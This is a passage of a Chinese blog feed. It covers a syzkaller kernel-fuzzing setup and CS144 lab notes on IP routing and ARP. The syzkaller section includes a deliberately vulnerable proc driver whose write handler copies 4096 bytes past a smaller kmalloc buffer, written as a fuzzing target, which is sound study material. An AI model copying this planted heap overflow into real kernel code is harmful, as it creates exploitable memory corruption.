S_IRUGO|S_IWUGO, <span class="literal">NULL</span>, proc_fops);</span><br><span class="line">    <span class="keyword">if</span>(!test_entry)</span><br><span class="line">       <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:there is somethings wrong!\n&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:proc init over!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_read</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, <span class="type">char</span> __user *proc_user, <span class="type">size_t</span> n, <span class="type">loff_t</span> *loff)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:finish copy_from_use,the string of newbuf is&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_write</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, <span class="type">const</span> <span class="type">char</span> __user *proc_user, <span class="type">size_t</span> n, <span class="type">loff_t</span> *loff)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> *c = <span class="built_in">kmalloc</span>(n + <span class="number">512</span>, GFP_KERNEL);</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> size = <span class="built_in">copy_from_user</span>(c, proc_user, n + <span class="number">4096</span>);</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:into write %ld!\n&quot;</span>, size);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">proc_open</span> <span class="params">(<span class="keyword">struct</span> inode *proc_inode, <span class="keyword">struct</span> file *proc_file)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:into open!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">module_init</span>(mod_init);</span><br></pre></td></tr></table></figure><p>然后<code>make</code>一下，之后就可以在 <code>/proc/test</code> 下找到目标 proc：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@syzkaller:~# <span class="built_in">ls</span> -al /proc/test </span><br><span class="line">-rw-rw-rw-. 1 root root 0 Nov 21 06:43 /proc/test</span><br></pre></td></tr></table></figure><p>很好，漏洞驱动已经成功加载进 kernel 中，接下来直接 poweroff 掉，开始配置 syzkaller。</p><h3 id="2-配置-syzkaller-规则">2. 配置 syzkaller 规则</h3><p>在 <code>syzkaller/sys/linux/</code> 创建一个对应于这个漏洞驱动的处理规则  <code>test.txt</code>（名字取什么无所谓），内容如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">include &lt;linux/fs.h&gt;</span><br><span class="line"> </span><br><span class="line">open$<span class="built_in">proc</span>(file ptr[in, string[<span class="string">&quot;/proc/test&quot;</span>]], flags flags[proc_open_flags], mode flags[proc_open_mode]) fd</span><br><span class="line">read$<span class="built_in">proc</span>(fd fd, buf buffer[out], count len[buf])</span><br><span class="line">write$<span class="built_in">proc</span>(fd fd, buf buffer[in], count len[buf])</span><br><span class="line">close$<span class="built_in">proc</span>(fd fd)</span><br><span class="line"> </span><br><span class="line">proc_open_flags = O_RDONLY, O_WRONLY, O_RDWR, O_APPEND, FASYNC, O_CLOEXEC, O_CREAT, O_DIRECT, O_DIRECTORY, O_EXCL, O_LARGEFILE, O_NOATIME, O_NOCTTY, O_NOFOLLOW, O_NONBLOCK, O_PATH, O_SYNC, O_TRUNC, __O_TMPFILE</span><br><span class="line">proc_open_mode = S_IRUSR, S_IWUSR, S_IXUSR, S_IRGRP, S_IWGRP, S_IXGRP, S_IROTH, S_IWOTH, S_IXOTH</span><br></pre></td></tr></table></figure><p>在 syzkaller 项目<strong>根目录</strong>下执行以下命令以创建对应的 .const 文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bin/syz-extract -os linux -sourcedir <span class="string">&quot;/usr/class/linux&quot;</span> -<span class="built_in">arch</span> amd64 test.txt</span><br></pre></td></tr></table></figure><p>执行以下命令重新构建 syzkaller</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bin/syz-sysgen</span><br><span class="line">make all</span><br></pre></td></tr></table></figure><p>此时 syzkaller 构建完成。</p><blockquote><p>可能你会有些疑问，为什么要配置这些规则，这些规则的配置基于什么，它的语法结构是什么样的。</p><p>以及，为什么要创建 .const 文件，创建后为什么要再跑一遍 syz-sysgen。</p><p>这些问题正是我写下这行文字时所产生的疑问。</p><p>不过暂时不急，因为后面都会慢慢讲到。</p></blockquote><h3 id="3-syzkaller-开跑">3. syzkaller 开跑</h3><p>在最后真正的执行前，我们需要修改一下 syzkaller 的运行配置。修改 my.cfg ，添加上以下内容：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;enable_syscalls&quot;</span>: [</span><br><span class="line">    <span class="string">&quot;open$proc&quot;</span>,</span><br><span class="line">    <span class="string">&quot;read$proc&quot;</span>,</span><br><span class="line">    <span class="string">&quot;write$proc&quot;</span>,</span><br><span class="line">    <span class="string">&quot;close$proc&quot;</span></span><br><span class="line">],</span><br></pre></td></tr></table></figure><p>之后执行 syzkaller 开跑：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bin/syz-manager -config my.cfg -vv 10</span><br></pre></td></tr></table></figure><p>过一小段时间（很快）后便可以得到：</p><p><img src="/2021/11/syzkaller_1/image-20211122092540576.png" alt="image-20211122092540576"></p><p>此时 syzkaller 正在复现 crash，crash样例不太直观：</p><p><img src="/2021/11/syzkaller_1/image-20211122093042147.png" alt="image-20211122093042147"></p><p>不过问题不大，再等<strong>亿段</strong>时间，<s>我们便可以在网页端查看到其效果</s> 可能是我点背，等了半个小时没等到 reprocude 结束（复现要花n久的时间…）：</p><p><img src="/2021/11/syzkaller_1/image-20211122095516144.png" alt="image-20211122095516144"></p><p>试用了一段时间，不得不说一下，当 syzkaller 检测到 crash 时，<strong>貌似</strong>它会停下所有 VM 跑来复现这个 crash。这样的话个人感觉可能会带来一点性能开销？（不是很懂）</p><h2 id="四、参考链接">四、参考链接</h2><ul><li><a href="https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md">syzkaller 官方文档</a></li><li><a href="https://github.com/hardenedlinux/Debian-GNU-Linux-Profiles/blob/master/docs/harbian_qa/fuzz_testing/syzkaller_crash_demo.md">Syzkaller crash DEMO - github</a></li><li><a href="https://bbs.pediy.com/thread-265405.htm">[原创]从0到1开始使用syzkaller进行Linux内核漏洞挖掘 - 看雪</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;Syzkaller 是一个无监督的覆盖引导的内核 fuzzer，是目前类似里程碑一样的 fuzz 。&lt;/p&gt;
&lt;p&gt;项目地址 - &lt;a href=&quot;https://github.com/google/syzkaller&quot;&gt;syzkaller&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;本人对 syzkaller 的工作机制比较感兴趣，同时课题组也会经常用到 syzkaller，因此了解 syzkaller 是一个必不可少的过程。&lt;/p&gt;
&lt;p&gt;在研究内核fuzz的工作机制之前，我们需要先学会如何搭建它的环境。&lt;/p&gt;</summary>
    
    
    
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
    <category term="kernel" scheme="https://kiprey.github.io/tags/kernel/"/>
    
    <category term="syzkaller" scheme="https://kiprey.github.io/tags/syzkaller/"/>
    
  </entry>
  
  <entry>
    <title>CS144计算机网络 Lab6</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab6/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab6/</id>
    <published>2021-11-17T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.920Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录了笔者学习 CS144 计算机网络 Lab6 的一些笔记 - <strong>IP Router 路由器</strong> 的实现</p><p>CS144 Lab6 实验指导书 - <a href="https://cs144.github.io/assignments/lab6.pdf">Lab Checkpoint 6: building an IP router</a></p><p>个人 CS144 实验项目地址 - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><p>在这个实验中，我们将完成一个<strong>简易</strong>路由器，其功能是：对于给定的数据包，<strong>确认发送接口</strong>以及<strong>下一跳的 IP 地址</strong>。为了简化实验难度，该实验中<strong>无需处理任何复杂路由协议</strong>，实验代码最多只需30行。</p><p><img src="/2021/11/cs144-lab6/image-20211118175306520.png" alt="image-20211118175306520"></p><h2 id="二、环境配置">二、环境配置</h2><p>当前我们的实验代码位于 <code>master</code> 分支，而在完成 Lab 之前需要合并一些依赖代码，因此执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab6-startercode</span><br></pre></td></tr></table></figure><p>之后重新 make 编译即可。</p><h2 id="三、Router-的实现">三、Router 的实现</h2><p>这里的 Router 实现比较简单，只需实现一下 IP 最长匹配并将数据包转发即可。</p><p>类私有成员实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Router</span> &#123;</span><br><span class="line">    <span class="comment">//! The router&#x27;s collection of network interfaces</span></span><br><span class="line">    std::vector&lt;AsyncNetworkInterface&gt; _interfaces&#123;&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Send a single datagram from the appropriate outbound interface to the next hop,</span></span><br><span class="line">    <span class="comment">//! as specified by the route with the longest prefix_length that matches the</span></span><br><span class="line">    <span class="comment">//! datagram&#x27;s destination address.</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">route_one_datagram</span><span class="params">(InternetDatagram &amp;dgram)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">RouterTableEntry</span> &#123;</span><br><span class="line">        <span class="type">const</span> <span class="type">uint32_t</span> route_prefix;</span><br><span class="line">        <span class="type">const</span> <span class="type">uint8_t</span> prefix_length;</span><br><span class="line">        <span class="type">const</span> std::optional&lt;Address&gt; next_hop;</span><br><span class="line">        <span class="type">const</span> <span class="type">size_t</span> interface_idx;</span><br><span class="line">    &#125;;</span><br><span class="line">    std::vector&lt;RouterTableEntry&gt; _router_table&#123;&#125;;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span>:</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>类函数方法实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//! \param[in] route_prefix The &quot;up-to-32-bit&quot; IPv4 address prefix to match the datagram&#x27;s destination address against</span></span><br><span class="line"><span class="comment">//! \param[in] prefix_length For this route to be applicable, how many high-order (most-significant) bits of the route_prefix will need to match the corresponding bits of the datagram&#x27;s destination address?</span></span><br><span class="line"><span class="comment">//! \param[in] next_hop The IP address of the next hop. Will be empty if the network is directly attached to the router (in which case, the next hop address should be the datagram&#x27;s final destination).</span></span><br><span class="line"><span class="comment">//! \param[in] interface_num The index of the interface to send the datagram out on.</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">Router::add_route</span><span class="params">(<span class="type">const</span> <span class="type">uint32_t</span> route_prefix,</span></span></span><br><span class="line"><span class="params"><span class="function">                       <span class="type">const</span> <span class="type">uint8_t</span> prefix_length,</span></span></span><br><span class="line"><span class="params"><span class="function">                       <span class="type">const</span> optional&lt;Address&gt; next_hop,</span></span></span><br><span class="line"><span class="params"><span class="function">                       <span class="type">const</span> <span class="type">size_t</span> interface_num)</span> </span>&#123;</span><br><span class="line">    cerr &lt;&lt; <span class="string">&quot;DEBUG: adding route &quot;</span> &lt;&lt; Address::<span class="built_in">from_ipv4_numeric</span>(route_prefix).<span class="built_in">ip</span>() &lt;&lt; <span class="string">&quot;/&quot;</span> &lt;&lt; <span class="built_in">int</span>(prefix_length)</span><br><span class="line">         &lt;&lt; <span class="string">&quot; =&gt; &quot;</span> &lt;&lt; (next_hop.<span class="built_in">has_value</span>() ? next_hop-&gt;<span class="built_in">ip</span>() : <span class="string">&quot;(direct)&quot;</span>) &lt;&lt; <span class="string">&quot; on interface &quot;</span> &lt;&lt; interface_num &lt;&lt; <span class="string">&quot;\n&quot;</span>;</span><br><span class="line"></span><br><span class="line">    _router_table.<span class="built_in">push_back</span>(&#123;route_prefix, prefix_length, next_hop, interface_num&#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! \param[in] dgram The datagram to be routed</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">Router::route_one_datagram</span><span class="params">(InternetDatagram &amp;dgram)</span> </span>&#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">uint32_t</span> dst_ip_addr = dgram.<span class="built_in">header</span>().dst;</span><br><span class="line">    <span class="keyword">auto</span> max_matched_entry = _router_table.<span class="built_in">end</span>();</span><br><span class="line">    <span class="comment">// 开始查询</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> router_entry_iter = _router_table.<span class="built_in">begin</span>(); router_entry_iter != _router_table.<span class="built_in">end</span>();</span><br><span class="line">         router_entry_iter++) &#123;</span><br><span class="line">        <span class="comment">// 如果前缀匹配匹配长度为 0，或者前缀匹配相同</span></span><br><span class="line">        <span class="keyword">if</span> (router_entry_iter-&gt;prefix_length == <span class="number">0</span> ||</span><br><span class="line">            (router_entry_iter-&gt;route_prefix ^ dst_ip_addr) &gt;&gt; (<span class="number">32</span> - router_entry_iter-&gt;prefix_length) == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="comment">// 如果条件符合，则更新最匹配的条目</span></span><br><span class="line">            <span class="keyword">if</span> (max_matched_entry == _router_table.<span class="built_in">end</span>() ||</span><br><span class="line">                max_matched_entry-&gt;prefix_length &lt; router_entry_iter-&gt;prefix_length)</span><br><span class="line">                max_matched_entry = router_entry_iter;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 将数据包 TTL 减去1</span></span><br><span class="line">    <span class="comment">// 如果存在最匹配的，并且数据包仍然存活，则将其转发</span></span><br><span class="line">    <span class="keyword">if</span> (max_matched_entry != _router_table.<span class="built_in">end</span>() &amp;&amp; dgram.<span class="built_in">header</span>().ttl-- &gt; <span class="number">1</span>) &#123;</span><br><span class="line">        <span class="type">const</span> optional&lt;Address&gt; next_hop = max_matched_entry-&gt;next_hop;</span><br><span class="line">        AsyncNetworkInterface &amp;interface = _interfaces[max_matched_entry-&gt;interface_idx];</span><br><span class="line">        <span class="keyword">if</span> (next_hop.<span class="built_in">has_value</span>())</span><br><span class="line">            interface.<span class="built_in">send_datagram</span>(dgram, next_hop.<span class="built_in">value</span>());</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            interface.<span class="built_in">send_datagram</span>(dgram, Address::<span class="built_in">from_ipv4_numeric</span>(dst_ip_addr));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 其他情况下则丢弃该数据包</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="四、测试">四、测试</h2><p>这是 CS144 的测试网络拓扑：</p><p><img src="/2021/11/cs144-lab6/image-20211118175644978.png" alt="image-20211118175644978"></p><p>以下是我的测试结果：</p><p><img src="/2021/11/cs144-lab6/image-20211118210129124.png" alt="image-20211118210129124"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录了笔者学习 CS144 计算机网络 Lab6 的一些笔记 - &lt;strong&gt;IP Router 路由器&lt;/strong&gt; 的实现&lt;/p&gt;
&lt;p&gt;CS144 Lab6 实验指导书 - &lt;a href=&quot;https://cs144.github.io/assignments/lab6.pdf&quot;&gt;Lab Checkpoint 6: building an IP router&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;个人 CS144 实验项目地址 - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144计算机网络 Lab7</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab7/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab7/</id>
    <published>2021-11-17T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.922Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录了笔者学习 CS144 计算机网络 Lab7 的一些笔记（？）</p><p>这也是 CS144 的最终实验（终于快完结了）</p><p>CS144 Lab7 实验指导书 - <a href="https://cs144.github.io/assignments/lab7.pdf">Final checkpoint: putting it all together</a></p><p>个人 CS144 实验项目地址 - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><p>该实验无需进行任何编码操作。</p><p>同时我们还可以在这个实验中，将之前7个实验里所有实现的内容全部粘合在一起，并与真实网络进行通信。</p><p>这是最终粘合的效果：</p><p><img src="/2021/11/cs144-lab7/image-20211118211047223.png" alt="image-20211118211047223"></p><h2 id="二、环境配置">二、环境配置</h2><p>当前我们的实验代码位于 <code>master</code> 分支，而在完成 Lab 之前需要合并一些依赖代码，因此执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab7-startercode</span><br></pre></td></tr></table></figure><p>之后重新 make 编译即可。</p><h2 id="三、运行">三、运行</h2><p>在两个终端分别执行以下两个命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./apps/lab7 server cs144.keithw.org 3000</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./apps/lab7 client cs144.keithw.org 3001</span><br></pre></td></tr></table></figure><p>便可以看到两个服务成功相互连接：</p><p><img src="/2021/11/cs144-lab7/image-20211118212210235.png" alt="image-20211118212210235"></p><p><img src="/2021/11/cs144-lab7/image-20211118212219097.png" alt="image-20211118212219097"></p><p>CS144 最终全部测试结果如下：</p><p><img src="/2021/11/cs144-lab7/image-20211118212610868.png" alt="image-20211118212610868"></p><p>CS144 圆满结束！完结撒花！</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录了笔者学习 CS144 计算机网络 Lab7 的一些笔记（？）&lt;/p&gt;
&lt;p&gt;这也是 CS144 的最终实验（终于快完结了）&lt;/p&gt;
&lt;p&gt;CS144 Lab7 实验指导书 - &lt;a href=&quot;https://cs144.github.io/assignments/lab7.pdf&quot;&gt;Final checkpoint: putting it all together&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;个人 CS144 实验项目地址 - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144计算机网络 Lab5</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab5/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab5/</id>
    <published>2021-11-15T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.919Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录了笔者学习 CS144 计算机网络 Lab5 的一些笔记 - <strong>网络接口 network interface（也被称为适配器）</strong> 的实现</p><p>CS144 Lab5 实验指导书 - <a href="https://cs144.github.io/assignments/lab5.pdf">Lab Checkpoint 5: down the stack (the network interface)</a></p><p>个人 CS144 实验项目地址 - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境配置">二、环境配置</h2><p>当前我们的实验代码位于 <code>master</code> 分支，而在完成 Lab 之前需要合并一些依赖代码，因此执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab5-startercode</span><br></pre></td></tr></table></figure><p>之后重新 make 编译即可。</p><h2 id="三、TCP报文的数据传输方式">三、TCP报文的数据传输方式</h2><p>TCP报文有三种方式可被传送至远程服务器，分别是：</p><ul><li><p><strong>TCP</strong>-in-UDP-in-IP：用户提供 TCP 包，之后可以使用 Linux 提供的接口，让内核来负责构造 UDP 报头、IP报头以及以太网报头，并将构造出的数据包发送至下一个层。因为这一切都是内核完成的任务，因此内核可以确保每个套接字都具有<strong>本地地址与端口，以及远程地址与端口的唯一组合</strong>，同时能保证不同进程之前的隔离。</p></li><li><p><strong>TCP-in-IP</strong>：通常，TCP数据包是直接放进 IP 包作为其 payload，这也因此被称为 TCP/IP。但用户层如果想直接操作构造 IP 报文的话，需要使用到 <strong>Linux 提供的 TUN 虚拟网络设备</strong>来作为中转。当用户将 IP 报文发送给 TUN 设备后，剩余的以太网报头构造、发送以太网帧等等的操作均会由内核自动进行，无需用户干预。</p><blockquote><p>这一个正是之前 Lab4 中 CS144 所使用的机制，感兴趣可以仔细读读代码。</p></blockquote></li><li><p><strong>TCP-in-IP-in-Ethernet</strong>：上面两种方式仍然依赖Linux内核来实现的协议栈操作。每次用户向TUN设备写入IP数据报时，Linux 内核都必须构造一个适当的链路层(以太网)帧，并将IP数据报作为其 payload。因此 Linux 必须找出下一跳的以太网目的地址，给出下一跳的IP地址。如果 Linux 无法得知该映射关系，则将会发出广播探测请求以查找到下一跳的地址等信息。而这种功能是由<strong>网络接口 network interface</strong> （也被称为<strong>适配器</strong>，两者等价）所实现，它将会把<strong>待出口的 IP 报文</strong>转换成链路层（以太网）帧等等，之后将链路层帧发送给 <strong>TAP 虚拟网络设备</strong>，剩下的发送操作将会由它来代为完成。</p><blockquote><p>比较熟悉的网络接口分别是 eth0, eth1, whan0 等等。</p></blockquote><p>网络接口的大部分工作是：<strong>为每个下一跳IP地址查找(和缓存)以太网地址</strong>。而这种协议被称为<strong>地址解析协议ARP</strong>。</p><p>在本实验中，我们将会完成一个这样的网络接口实现（有点小期待）。</p></li></ul><h2 id="四、地址解析协议-ARP">四、地址解析协议 ARP</h2><p>在编写代码前，我们需要简单的了解一下 ARP 协议。</p><p>主机或路由器不具有链路层地址，而是它们的适配器（即网络接口）具有链路层地址。链路层地址通常称为 <strong>MAC 地址</strong>。当某个适配器要向某些目的适配器发送一个帧时，发送适配器将目的适配器的 MAC 地址插入至该帧中，并将该帧发送到局域网上。一块适配器可能因为广播操作，接收到了一个并非向它寻址的帧，因此当适配器接收到一个帧时，将检查并丢弃<strong>帧的目的MAC地址不与自己MAC地址匹配</strong>的以太网帧。</p><p>为什么适配器除了有**网络层地址（IP地址）<strong>以外，还会有</strong>链路层地址（MAC地址）**呢？有两个原因：</p><ul><li>局域网是为了<strong>任意</strong>网络层协议而设计，并非只用于 IP 和因特网。</li><li>如果适配器使用 IP地址而不使用 MAC 地址，那么每次适配器移动或重启时，<strong>均需重新配置地址</strong>。</li></ul><p>由于适配器同时拥有网络层和链路层地址，因此需要相互转化。而这种转换的任务就由 <strong>地址解析协议</strong> 来完成。ARP 类似于 DNS 服务，但不同的是，DNS 为<strong>任何地方的主机</strong>来解析主机名，但 ARP 只能为<strong>在同一个子网上的主机和路由器接口</strong>解析 IP 地址。</p><p>每台主机或路由器在其内存中保存了一张 ARP 表，该表包含了 IP 地址到 MAC 地址的映射关系，同时还包含了一个寿命值（TTL），用以表示从表中删除每个映射的时间，例如：</p><table><thead><tr><th style="text-align:center">IP 地址</th><th style="text-align:center">MAC 地址</th><th style="text-align:center">TTL</th></tr></thead><tbody><tr><td style="text-align:center">222.222.222.221</td><td style="text-align:center">aa-bb-cc-dd-ee-ff</td><td style="text-align:center">13:45:00</td></tr><tr><td style="text-align:center">222.222.222.223</td><td style="text-align:center">11-22-33-44-55-66</td><td style="text-align:center">4:34:12</td></tr><tr><td style="text-align:center">…</td><td style="text-align:center">…</td><td style="text-align:center">…</td></tr></tbody></table><p>若 ARP 表中已经存放了目标 IP 地址的 MAC 地址映射，那么适配器将会很容易的找出目标 MAC 地址并构造一个以太网帧。但如果找不到，那么发送方将会构造一个 <strong>ARP 分组</strong>的特殊分组。</p><p>ARP 分组中的字段包括<strong>发送和接收 IP 地址以及 MAC 地址</strong>，同时 ARP 查询分组和<strong>响应分组</strong>都具有相同的格式。ARP 查询分组的目的是询问子网上所有其他主机和路由器，以确定对应于要解析的 IP 地址的那个 MAC 地址。</p><p>当发送适配器需要查询目的适配器的 MAC 地址时，发送适配器会设置分组的目的地址为 <strong>MAC 广播地址（FF-FF-FF-FF-FF-FF）</strong>，这样做的目的是为了让<strong>所有</strong>子网上的其他适配器都接收到。当其他适配器接收到了该 ARP 查询分组后，<strong>只有 IP 匹配的适配器</strong>才会返回一个 ARP 响应分组，之后发送适配器便可更新自己的 ARP 表，并开始发送 IP 报文。</p><p>查询ARP报文是在<strong>广播帧</strong>中发送，而响应ARP报文只在一个<strong>标准帧</strong>中发送。同时 ARP 表是自动建立的，无需人为设置。若主机与子网断开连接，那么该节点留在其他节点的 ARP 表中对应的条目也会被自动删除。</p><p>与之相对的，<strong>ARP欺骗攻击</strong>可以利用 <strong>ARP 协议不提供对网络上的 ARP 回复进行身份验证</strong> 这样的一个缺陷，来轻易执行中间人攻击或者 DOS 攻击。</p><blockquote><p>其他详细信息可以看看 <a href="https://datatracker.ietf.org/doc/html/rfc826">RFC826</a> 规范。</p></blockquote><h2 id="五、Network-Interface-具体实现">五、Network Interface 具体实现</h2><p>首先， 我们需要额外设置三个数据结构，分别是：</p><ul><li><p><code>_arp_table</code>：ARP 表，用以查询 IP至MAC地址的映射，同时还保存当前 ARP 条目的 TTL。</p><blockquote><p>ARP条目 TTL 为 30s。</p></blockquote></li><li><p><code>_waiting_arp_response_ip_addr</code>：已经发送了的 ARP 报文。必须确保每个 ARP 报文在<strong>5秒</strong>内不重复发送。</p></li><li><p><code>_waiting_arp_internet_datagrams</code>：这里存放着<strong>等待ARP返回报文</strong>的 IP 报文。只有对应 ARP 返回报文到来，更新了 ARP 表后，网络接口才会知道这些 IP 报文要发送至哪个 MAC 地址。</p></li></ul><p>在实现整个网络接口时，必须确保几点</p><ul><li><strong>ARP条目 TTL 为30s</strong>，时间到期后需要将其从 ARP Table 中删除。</li><li>若发送 IP 报文时，发现 ARP Table 中无目标 MAC 地址，则立即发送 ARP 请求报文，同时将当前 IP 报文暂时缓存，直至获取到目标 MAC 地址后再重新发送。</li><li><strong>不同目标 IP 的 ARP 请求报文</strong>之间的发送间隔，<strong>不能超过 5s</strong>。</li><li>如果 ARP 请求报文在 5 